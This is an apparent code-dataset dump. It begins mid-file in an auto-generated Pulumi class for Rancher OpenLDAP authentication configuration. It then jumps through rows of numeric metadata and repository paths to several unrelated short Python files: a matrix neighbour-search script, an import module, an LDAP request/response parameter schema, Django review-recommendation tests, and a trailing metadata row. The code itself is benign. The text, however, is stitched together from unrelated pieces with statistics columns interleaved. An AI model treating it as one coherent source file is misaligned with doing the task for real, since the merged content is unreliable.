group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AuthConfigOpenLdapArgs.__new__(AuthConfigOpenLdapArgs)
__props__.__dict__["access_mode"] = access_mode
__props__.__dict__["allowed_principal_ids"] = allowed_principal_ids
__props__.__dict__["annotations"] = annotations
__props__.__dict__["certificate"] = certificate
__props__.__dict__["connection_timeout"] = connection_timeout
__props__.__dict__["enabled"] = enabled
__props__.__dict__["group_dn_attribute"] = group_dn_attribute
__props__.__dict__["group_member_mapping_attribute"] = group_member_mapping_attribute
__props__.__dict__["group_member_user_attribute"] = group_member_user_attribute
__props__.__dict__["group_name_attribute"] = group_name_attribute
__props__.__dict__["group_object_class"] = group_object_class
__props__.__dict__["group_search_attribute"] = group_search_attribute
__props__.__dict__["group_search_base"] = group_search_base
__props__.__dict__["labels"] = labels
__props__.__dict__["nested_group_membership_enabled"] = nested_group_membership_enabled
__props__.__dict__["port"] = port
if servers is None and not opts.urn:
raise TypeError("Missing required property 'servers'")
__props__.__dict__["servers"] = servers
if service_account_distinguished_name is None and not opts.urn:
raise TypeError("Missing required property 'service_account_distinguished_name'")
__props__.__dict__["service_account_distinguished_name"] = service_account_distinguished_name
if service_account_password is None and not opts.urn:
raise TypeError("Missing required property 'service_account_password'")
__props__.__dict__["service_account_password"] = service_account_password
if test_password is None and not opts.urn:
raise TypeError("Missing required property 'test_password'")
__props__.__dict__["test_password"] = test_password
if test_username is None and not opts.urn:
raise TypeError("Missing required property 'test_username'")
__props__.__dict__["test_username"] = test_username
__props__.__dict__["tls"] = tls
__props__.__dict__["user_disabled_bit_mask"] = user_disabled_bit_mask
__props__.__dict__["user_enabled_attribute"] = user_enabled_attribute
__props__.__dict__["user_login_attribute"] = user_login_attribute
__props__.__dict__["user_member_attribute"] = user_member_attribute
__props__.__dict__["user_name_attribute"] = user_name_attribute
__props__.__dict__["user_object_class"] = user_object_class
__props__.__dict__["user_search_attribute"] = user_search_attribute
if user_search_base is None and not opts.urn:
raise TypeError("Missing required property 'user_search_base'")
__props__.__dict__["user_search_base"] = user_search_base
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
super(AuthConfigOpenLdap, __self__).__init__(
'rancher2:index/authConfigOpenLdap:AuthConfigOpenLdap',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
type: Optional[pulumi.Input[str]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None) -> 'AuthConfigOpenLdap':
"""
Get an existing AuthConfigOpenLdap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[str] name: (Computed) The name of the resource (string)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[str] type: (Computed) The type of the resource (string)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AuthConfigOpenLdapState.__new__(_AuthConfigOpenLdapState)
__props__.__dict__["access_mode"] = access_mode
__props__.__dict__["allowed_principal_ids"] = allowed_principal_ids
__props__.__dict__["annotations"] = annotations
__props__.__dict__["certificate"] = certificate
__props__.__dict__["connection_timeout"] = connection_timeout
__props__.__dict__["enabled"] = enabled
__props__.__dict__["group_dn_attribute"] = group_dn_attribute
__props__.__dict__["group_member_mapping_attribute"] = group_member_mapping_attribute
__props__.__dict__["group_member_user_attribute"] = group_member_user_attribute
__props__.__dict__["group_name_attribute"] = group_name_attribute
__props__.__dict__["group_object_class"] = group_object_class
__props__.__dict__["group_search_attribute"] = group_search_attribute
__props__.__dict__["group_search_base"] = group_search_base
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["nested_group_membership_enabled"] = nested_group_membership_enabled
__props__.__dict__["port"] = port
__props__.__dict__["servers"] = servers
__props__.__dict__["service_account_distinguished_name"] = service_account_distinguished_name
__props__.__dict__["service_account_password"] = service_account_password
__props__.__dict__["test_password"] = test_password
__props__.__dict__["test_username"] = test_username
__props__.__dict__["tls"] = tls
__props__.__dict__["type"] = type
__props__.__dict__["user_disabled_bit_mask"] = user_disabled_bit_mask
__props__.__dict__["user_enabled_attribute"] = user_enabled_attribute
__props__.__dict__["user_login_attribute"] = user_login_attribute
__props__.__dict__["user_member_attribute"] = user_member_attribute
__props__.__dict__["user_name_attribute"] = user_name_attribute
__props__.__dict__["user_object_class"] = user_object_class
__props__.__dict__["user_search_attribute"] = user_search_attribute
__props__.__dict__["user_search_base"] = user_search_base
return AuthConfigOpenLdap(resource_name, opts=opts, __props__=__props__)
    # --- Resource output properties -------------------------------------------
    # Each getter below reads one resolved output value from the Pulumi engine
    # via pulumi.get(); the @pulumi.getter name= argument maps the provider's
    # camelCase key to the Python snake_case attribute.
    @property
    @pulumi.getter(name="accessMode")
    def access_mode(self) -> pulumi.Output[Optional[str]]:
        """
        Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
        """
        return pulumi.get(self, "access_mode")

    @property
    @pulumi.getter(name="allowedPrincipalIds")
    def allowed_principal_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
        """
        return pulumi.get(self, "allowed_principal_ids")

    @property
    @pulumi.getter
    def annotations(self) -> pulumi.Output[Mapping[str, Any]]:
        """
        Annotations of the resource (map)
        """
        return pulumi.get(self, "annotations")

    @property
    @pulumi.getter
    def certificate(self) -> pulumi.Output[Optional[str]]:
        """
        Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
        """
        return pulumi.get(self, "certificate")

    @property
    @pulumi.getter(name="connectionTimeout")
    def connection_timeout(self) -> pulumi.Output[Optional[int]]:
        """
        OpenLdap connection timeout. Default `5000` (int)
        """
        return pulumi.get(self, "connection_timeout")

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Enable auth config provider. Default `true` (bool)
        """
        return pulumi.get(self, "enabled")

    @property
    @pulumi.getter(name="groupDnAttribute")
    def group_dn_attribute(self) -> pulumi.Output[str]:
        """
        Group DN attribute. Default `entryDN` (string)
        """
        return pulumi.get(self, "group_dn_attribute")

    @property
    @pulumi.getter(name="groupMemberMappingAttribute")
    def group_member_mapping_attribute(self) -> pulumi.Output[str]:
        """
        Group member mapping attribute. Default `member` (string)
        """
        return pulumi.get(self, "group_member_mapping_attribute")

    @property
    @pulumi.getter(name="groupMemberUserAttribute")
    def group_member_user_attribute(self) -> pulumi.Output[str]:
        """
        Group member user attribute. Default `entryDN` (string)
        """
        return pulumi.get(self, "group_member_user_attribute")

    @property
    @pulumi.getter(name="groupNameAttribute")
    def group_name_attribute(self) -> pulumi.Output[str]:
        """
        Group name attribute. Default `cn` (string)
        """
        return pulumi.get(self, "group_name_attribute")

    @property
    @pulumi.getter(name="groupObjectClass")
    def group_object_class(self) -> pulumi.Output[str]:
        """
        Group object class. Default `groupOfNames` (string)
        """
        return pulumi.get(self, "group_object_class")

    @property
    @pulumi.getter(name="groupSearchAttribute")
    def group_search_attribute(self) -> pulumi.Output[str]:
        """
        Group search attribute. Default `cn` (string)
        """
        return pulumi.get(self, "group_search_attribute")

    @property
    @pulumi.getter(name="groupSearchBase")
    def group_search_base(self) -> pulumi.Output[str]:
        """
        Group search base (string)
        """
        return pulumi.get(self, "group_search_base")

    @property
    @pulumi.getter
    def labels(self) -> pulumi.Output[Mapping[str, Any]]:
        """
        Labels of the resource (map)
        """
        return pulumi.get(self, "labels")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        (Computed) The name of the resource (string)
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="nestedGroupMembershipEnabled")
    def nested_group_membership_enabled(self) -> pulumi.Output[bool]:
        """
        Nested group membership enable. Default `false` (bool)
        """
        return pulumi.get(self, "nested_group_membership_enabled")

    @property
    @pulumi.getter
    def port(self) -> pulumi.Output[Optional[int]]:
        """
        OpenLdap port. Default `389` (int)
        """
        return pulumi.get(self, "port")

    @property
    @pulumi.getter
    def servers(self) -> pulumi.Output[Sequence[str]]:
        """
        OpenLdap servers list (list)
        """
        return pulumi.get(self, "servers")

    @property
    @pulumi.getter(name="serviceAccountDistinguishedName")
    def service_account_distinguished_name(self) -> pulumi.Output[str]:
        """
        Service account DN for access OpenLdap service (string)
        """
        return pulumi.get(self, "service_account_distinguished_name")

    @property
    @pulumi.getter(name="serviceAccountPassword")
    def service_account_password(self) -> pulumi.Output[str]:
        """
        Service account password for access OpenLdap service (string)
        """
        return pulumi.get(self, "service_account_password")

    @property
    @pulumi.getter(name="testPassword")
    def test_password(self) -> pulumi.Output[str]:
        """
        Password for test access to OpenLdap service (string)
        """
        return pulumi.get(self, "test_password")

    @property
    @pulumi.getter(name="testUsername")
    def test_username(self) -> pulumi.Output[str]:
        """
        Username for test access to OpenLdap service (string)
        """
        return pulumi.get(self, "test_username")

    @property
    @pulumi.getter
    def tls(self) -> pulumi.Output[bool]:
        """
        Enable TLS connection (bool)
        """
        return pulumi.get(self, "tls")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        (Computed) The type of the resource (string)
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="userDisabledBitMask")
    def user_disabled_bit_mask(self) -> pulumi.Output[int]:
        """
        User disabled bit mask (int)
        """
        return pulumi.get(self, "user_disabled_bit_mask")

    @property
    @pulumi.getter(name="userEnabledAttribute")
    def user_enabled_attribute(self) -> pulumi.Output[str]:
        """
        User enable attribute (string)
        """
        return pulumi.get(self, "user_enabled_attribute")

    @property
    @pulumi.getter(name="userLoginAttribute")
    def user_login_attribute(self) -> pulumi.Output[str]:
        """
        User login attribute. Default `uid` (string)
        """
        return pulumi.get(self, "user_login_attribute")

    @property
    @pulumi.getter(name="userMemberAttribute")
    def user_member_attribute(self) -> pulumi.Output[str]:
        """
        User member attribute. Default `memberOf` (string)
        """
        return pulumi.get(self, "user_member_attribute")

    @property
    @pulumi.getter(name="userNameAttribute")
    def user_name_attribute(self) -> pulumi.Output[str]:
        """
        User name attribute. Default `givenName` (string)
        """
        return pulumi.get(self, "user_name_attribute")

    @property
    @pulumi.getter(name="userObjectClass")
    def user_object_class(self) -> pulumi.Output[str]:
        """
        User object class. Default `inetorgperson` (string)
        """
        return pulumi.get(self, "user_object_class")

    @property
    @pulumi.getter(name="userSearchAttribute")
    def user_search_attribute(self) -> pulumi.Output[str]:
        """
        User search attribute. Default `uid|sn|givenName` (string)
        """
        return pulumi.get(self, "user_search_attribute")

    @property
    @pulumi.getter(name="userSearchBase")
    def user_search_base(self) -> pulumi.Output[str]:
        """
        User search base DN (string)
        """
        return pulumi.get(self, "user_search_base")
| 47.251744
| 227
| 0.668138
| 8,534
| 74,516
| 5.553668
| 0.027185
| 0.100264
| 0.088617
| 0.080304
| 0.958561
| 0.951535
| 0.937525
| 0.926849
| 0.918177
| 0.911594
| 0
| 0.001433
| 0.222516
| 74,516
| 1,576
| 228
| 47.281726
| 0.816639
| 0.251369
| 0
| 0.857291
| 1
| 0
| 0.125706
| 0.057359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168563
| false
| 0.056877
| 0.005171
| 0
| 0.275078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
6cb14ca24710d5a32a25624affaf5fd44f64eda5
| 1,011
|
py
|
Python
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 3
|
2021-08-18T01:59:50.000Z
|
2021-08-28T00:19:07.000Z
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 4
|
2021-03-09T18:39:47.000Z
|
2021-03-26T00:01:56.000Z
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 1
|
2022-03-20T14:54:09.000Z
|
2022-03-20T14:54:09.000Z
|
def _is_hole(mat, n, m, i, j):
    """Return True if mat[i][j] == 0 and every in-bounds orthogonal neighbour is 1.

    Fixes two defects of the original border handling:
    - negative indices (e.g. mat[i][j-1] with j == 0) silently wrapped to the
      opposite edge instead of being skipped;
    - the unconditional four-neighbour check raised IndexError on the last
      row/column when no earlier border branch matched.
    """
    if mat[i][j] != 0:
        return False
    neighbours = []
    if i > 0:
        neighbours.append(mat[i - 1][j])
    if i < n - 1:
        neighbours.append(mat[i + 1][j])
    if j > 0:
        neighbours.append(mat[i][j - 1])
    if j < m - 1:
        neighbours.append(mat[i][j + 1])
    return all(v == 1 for v in neighbours)


def find_hole(mat, n, m):
    """Return (i, j) of the first 0 whose in-bounds neighbours are all 1, else (0, 0).

    :param mat: n x m matrix of ints (0/1)
    :param n: number of rows
    :param m: number of columns
    """
    for i in range(n):
        for j in range(m):
            if _is_hole(mat, n, m, i, j):
                return i, j
    # Original behaviour: print "0 0" when no hole exists.
    return 0, 0


def main():
    """Read n, m and an n x m matrix from stdin; print the hole position."""
    n, m = [int(e) for e in input().split()]
    mat = [[int(e) for e in input().split()] for _ in range(n)]
    i, j = find_hole(mat, n, m)
    print(i, j)


if __name__ == "__main__":
    main()
| 29.735294
| 95
| 0.331355
| 174
| 1,011
| 1.925287
| 0.109195
| 0.202985
| 0.229851
| 0.262687
| 0.859701
| 0.78806
| 0.78806
| 0.78806
| 0.650746
| 0.650746
| 0
| 0.072626
| 0.468843
| 1,011
| 33
| 96
| 30.636364
| 0.55121
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9f4610a7e6a629e7a9bdcd73d7e9be93fc1f7fd1
| 121
|
py
|
Python
|
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
from finitewave.core.command.command import Command
from finitewave.core.command.command_sequence import CommandSequence
| 40.333333
| 68
| 0.884298
| 15
| 121
| 7.066667
| 0.466667
| 0.264151
| 0.339623
| 0.471698
| 0.603774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066116
| 121
| 2
| 69
| 60.5
| 0.938053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f7a4be8ce759b7e547712d816275d3d49b73d19
| 3,450
|
py
|
Python
|
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
class orgApiPara:
    """Parameter schemas for the org LDAP API endpoints.

    Each class attribute maps a field name to a spec dict with its expected
    ``type`` and ``default`` value, for the set/update org request/response
    payloads.

    Bug fixed: ``setOrg_POST_request`` and ``updateOrg_POST_request`` each had
    a trailing comma after the dict literal, which made them 1-tuples
    containing a dict rather than dicts (inconsistent with the ``_response``
    attributes). The trailing commas have been removed.
    """
    setOrg_POST_request = {"host": {"type": str, "default": ''},
                           "port": {"type": int, "default": 636},
                           "cer_path": {"type": str, "default": ''},
                           "use_sll": {"type": bool, "default": True},
                           "admin": {"type": str, "default": ''},
                           "admin_pwd": {"type": str, "default": ''},
                           "admin_group": {"type": str, "default": ''},
                           "base_group": {"type": str, "default": ''},
                           "org_name": {"type": str, "default": ''},
                           "des": {"type": str, "default": ''},
                           "search_base": {"type": str, "default": ''}}
    updateOrg_POST_request = {"id": {"type": int, "default": -1},
                              "host": {"type": str, "default": ''},
                              "port": {"type": int, "default": 636},
                              "cer_path": {"type": str, "default": ''},
                              "use_sll": {"type": bool, "default": True},
                              "admin": {"type": str, "default": ''},
                              "admin_pwd": {"type": str, "default": ''},
                              "admin_group": {"type": str, "default": ''},
                              "base_group": {"type": str, "default": ''},
                              "org_name": {"type": str, "default": ''},
                              "des": {"type": str, "default": ''},
                              "search_base": {"type": str, "default": ''}}
    setOrg_POST_response = {
        "ldap_id": {"type": int, "default": -1},
        "org_id": {"type": int, "default": -1},
        "host": {"type": str, "default": ''},
        "port": {"type": int, "default": 636},
        "cer_path": {"type": str, "default": ''},
        "use_sll": {"type": bool, "default": True},
        "admin": {"type": str, "default": ''},
        "admin_pwd": {"type": str, "default": ''},
        "admin_group": {"type": str, "default": ''},
        "base_group": {"type": str, "default": ''},
        "org_name": {"type": str, "default": ''},
        "des": {"type": str, "default": ''},
        "search_base": {"type": str, "default": ''}}
    updateOrg_POST_response = {
        "ldap_id": {"type": int, "default": -1},
        "org_id": {"type": int, "default": -1},
        "host": {"type": str, "default": ''},
        "port": {"type": int, "default": 636},
        "use_sll": {"type": bool, "default": True},
        "cer_path": {"type": str, "default": ''},
        "admin": {"type": str, "default": ''},
        "admin_pwd": {"type": str, "default": ''},
        "admin_group": {"type": str, "default": ''},
        "base_group": {"type": str, "default": ''},
        "org_name": {"type": str, "default": ''},
        "des": {"type": str, "default": ''},
        "search_base": {"type": str, "default": ''}}
| 60.526316
| 72
| 0.33913
| 255
| 3,450
| 4.431373
| 0.121569
| 0.223009
| 0.446018
| 0.151327
| 0.960177
| 0.941593
| 0.919469
| 0.919469
| 0.919469
| 0.919469
| 0
| 0.008971
| 0.450725
| 3,450
| 57
| 73
| 60.526316
| 0.587335
| 0
| 0
| 0.903846
| 0
| 0
| 0.257101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0.096154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9f986ec10f3e78183b662ab2929af55d8a60b9a2
| 3,671
|
py
|
Python
|
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
from django.test import TestCase
from opentech.apply.funds.tests.factories import ApplicationSubmissionFactory
from .factories import ReviewFactory, ReviewOpinionFactory
from ..options import MAYBE, NO, YES
class TestReviewQueryset(TestCase):
    """Checks that a submission's reviews collapse to the expected YES/NO/MAYBE recommendation."""

    @staticmethod
    def _submission_with_reviews(*review_kwargs):
        """Build one submission plus one review per kwargs dict; return (submission, reviews)."""
        submission = ApplicationSubmissionFactory()
        reviews = [ReviewFactory(submission=submission, **kwargs) for kwargs in review_kwargs]
        return submission, reviews

    def _assert_recommendation(self, submission, expected):
        """Assert the aggregated recommendation over all of the submission's reviews."""
        self.assertEqual(submission.reviews.recommendation(), expected)

    def test_reviews_yes(self):
        submission, _ = self._submission_with_reviews(
            {'recommendation_yes': True}, {'recommendation_yes': True})
        self._assert_recommendation(submission, YES)

    def test_reviews_no(self):
        submission, _ = self._submission_with_reviews({}, {})
        self._assert_recommendation(submission, NO)

    def test_reviews_maybe(self):
        submission, _ = self._submission_with_reviews(
            {'recommendation_maybe': True}, {'recommendation_maybe': True})
        self._assert_recommendation(submission, MAYBE)

    def test_reviews_mixed(self):
        submission, _ = self._submission_with_reviews({'recommendation_yes': True}, {})
        self._assert_recommendation(submission, MAYBE)

    def test_review_yes_opinion_agree(self):
        submission, reviews = self._submission_with_reviews({'recommendation_yes': True})
        ReviewOpinionFactory(review=reviews[0], opinion_agree=True)
        self._assert_recommendation(submission, YES)

    def test_review_yes_opinion_disagree(self):
        submission, reviews = self._submission_with_reviews({'recommendation_yes': True})
        ReviewOpinionFactory(review=reviews[0], opinion_disagree=True)
        self._assert_recommendation(submission, MAYBE)

    def test_review_no_opinion_agree(self):
        submission, reviews = self._submission_with_reviews({})
        ReviewOpinionFactory(review=reviews[0], opinion_agree=True)
        self._assert_recommendation(submission, NO)

    def test_review_no_opinion_disagree(self):
        submission, reviews = self._submission_with_reviews({})
        ReviewOpinionFactory(review=reviews[0], opinion_disagree=True)
        self._assert_recommendation(submission, MAYBE)

    def test_review_not_all_opinion(self):
        # Opinion attached to only one of the two yes-reviews.
        submission, reviews = self._submission_with_reviews(
            {'recommendation_yes': True}, {'recommendation_yes': True})
        ReviewOpinionFactory(review=reviews[1], opinion_agree=True)
        self._assert_recommendation(submission, YES)

    def test_review_yes_mixed_opinion(self):
        # One agree and one disagree opinion on the same (default/no) review.
        submission, reviews = self._submission_with_reviews({})
        ReviewOpinionFactory(review=reviews[0], opinion_agree=True)
        ReviewOpinionFactory(review=reviews[0], opinion_disagree=True)
        self._assert_recommendation(submission, MAYBE)
| 45.8875
| 78
| 0.752928
| 309
| 3,671
| 8.789644
| 0.106796
| 0.110457
| 0.154639
| 0.165685
| 0.875552
| 0.855302
| 0.816642
| 0.79676
| 0.79676
| 0.761414
| 0
| 0
| 0.174067
| 3,671
| 79
| 79
| 46.468354
| 0.895778
| 0
| 0
| 0.776119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 1
| 0.149254
| false
| 0
| 0.059701
| 0
| 0.223881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4c90072340fcbafd34ed47f1674ba9b82fd3e4b6
| 121
|
py
|
Python
|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | 1
|
2021-09-17T09:07:09.000Z
|
2021-09-17T09:07:09.000Z
|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | 2
|
2021-12-20T07:46:33.000Z
|
2022-02-24T07:02:05.000Z
